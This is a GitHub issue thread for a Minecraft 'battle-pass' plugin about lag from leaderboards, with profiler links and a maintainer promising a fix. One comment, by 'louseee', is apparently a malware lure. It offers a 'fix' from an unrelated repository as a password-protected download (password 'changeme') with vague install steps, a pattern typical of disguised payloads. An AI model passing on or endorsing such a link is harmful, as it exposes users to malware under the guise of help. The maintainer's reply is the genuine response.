### ISSUE TITLE
Leaderboards lags

### ISSUE THREAD

**Issue by bobhenl** [GC-spigot/battle-pass#591]
### Describe the bug

Hello, there started to be lags like 2d ago for my server, and it looks like it's because Battlepass leaderboards.
https://spark.lucko.me/mwbkrpDVtQ
https://spark.lucko.me/poOO3vUX46

### How to reproduce

Not really sure

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KPGTB** [comment]
Hey! The fix will be available in one of the next updates. After update, please enable leaderboard cache again
